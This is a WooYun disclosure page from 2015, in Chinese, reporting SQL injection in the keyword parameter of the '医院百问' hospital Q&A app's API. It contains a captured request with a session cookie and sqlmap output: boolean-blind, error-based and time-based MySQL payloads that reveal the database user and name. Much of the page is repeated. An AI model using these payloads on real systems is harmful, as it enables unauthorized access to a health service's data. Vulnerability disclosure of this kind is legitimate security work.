医院百问某处SQL注入漏洞 | wooyun-2015-0163066| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163066

漏洞标题：医院百问某处SQL注入漏洞

漏洞作者： Aasron

提交时间：2015-12-24 09:17

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-02-06：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

今天在AppStore里面看到一款新应用，于是就来测测~

测试时抓到一个提问的接口
抓包内容:

GET /restbaiwen/question/get_question_list?hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=&last_rec=0&page_size=20 HTTP/1.1
Host: nurse.capuhealth.com
Cookie: yd_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f23c8ed67d1600b6be13c54cf89cfbc3%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22221.237.31.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A54%3A%22%E5%8C%BB%E9%99%A2%E7%99%BE%E9%97%AE+1.5+rv%3A4.6+%28iPhone%3B+iPhone+OS+9.2%3B+zh_CN%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1450624887%3Bs%3A9%3A%22online_id%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D64b97cbd2d9db01a35d4e29d7c7b1ce3
User-Agent: å»é¢ç¾é® 1.5 rv:4.6 (iPhone; iPhone OS 9.2; zh_CN)
Connection: close
Accept-Encoding: gzip

注入参数#:keyword

首先得看看是不是root权限吧

不是！！

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND 1422=1422 AND
 '%'='&last_rec=0&page_size=20
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT 8636
FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(8636=8636,1))),0x717a6b6a7
1,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%
'='&last_rec=0&page_size=20
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT * FRO
M (SELECT(SLEEP(5)))CKLr) AND '%'='&last_rec=0&page_size=20
---
[00:45:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[00:45:04] [INFO] fetching current user
[00:45:04] [INFO] resumed: baiwen@%
current user:    'baiwen@%'

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND 1422=1422 AND
 '%'='&last_rec=0&page_size=20
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT 8636
FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(8636=8636,1))),0x717a6b6a7
1,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%
'='&last_rec=0&page_size=20
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT * FRO
M (SELECT(SLEEP(5)))CKLr) AND '%'='&last_rec=0&page_size=20
---
[00:45:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[00:45:51] [INFO] fetching current database
[00:45:51] [INFO] resumed: baiwen
current database:    'baiwen'

漏洞证明：

测试时抓到一个提问的接口
抓包内容:

GET /restbaiwen/question/get_question_list?hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=&last_rec=0&page_size=20 HTTP/1.1
Host: nurse.capuhealth.com
Cookie: yd_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f23c8ed67d1600b6be13c54cf89cfbc3%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22221.237.31.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A54%3A%22%E5%8C%BB%E9%99%A2%E7%99%BE%E9%97%AE+1.5+rv%3A4.6+%28iPhone%3B+iPhone+OS+9.2%3B+zh_CN%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1450624887%3Bs%3A9%3A%22online_id%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D64b97cbd2d9db01a35d4e29d7c7b1ce3
User-Agent: å»é¢ç¾é® 1.5 rv:4.6 (iPhone; iPhone OS 9.2; zh_CN)
Connection: close
Accept-Encoding: gzip

注入参数#:keyword

首先得看看是不是root权限吧

不是！！

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND 1422=1422 AND
 '%'='&last_rec=0&page_size=20
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT 8636
FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(8636=8636,1))),0x717a6b6a7
1,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%
'='&last_rec=0&page_size=20
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT * FRO
M (SELECT(SLEEP(5)))CKLr) AND '%'='&last_rec=0&page_size=20
---
[00:45:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[00:45:04] [INFO] fetching current user
[00:45:04] [INFO] resumed: baiwen@%
current user:    'baiwen@%'

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND 1422=1422 AND
 '%'='&last_rec=0&page_size=20
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT 8636
FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(8636=8636,1))),0x717a6b6a7
1,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%
'='&last_rec=0&page_size=20
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hospital_id=NiTngf1oNmjxE3MTQyMTc2MDEw&keyword=%' AND (SELECT * FRO
M (SELECT(SLEEP(5)))CKLr) AND '%'='&last_rec=0&page_size=20
---
[00:45:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[00:45:51] [INFO] fetching current database
[00:45:51] [INFO] resumed: baiwen
current database:    'baiwen'

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163066

漏洞标题：医院百问某处SQL注入漏洞

相关厂商：医院百问

漏洞作者： Aasron

提交时间：2015-12-24 09:17

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Aasron@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0163066

漏洞标题：医院百问某处SQL注入漏洞

相关厂商：医院百问

漏洞作者： Aasron

提交时间：2015-12-24 09:17

修复时间：2016-02-06 10:45

公开时间：2016-02-06 10:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0163066"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Aasron@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：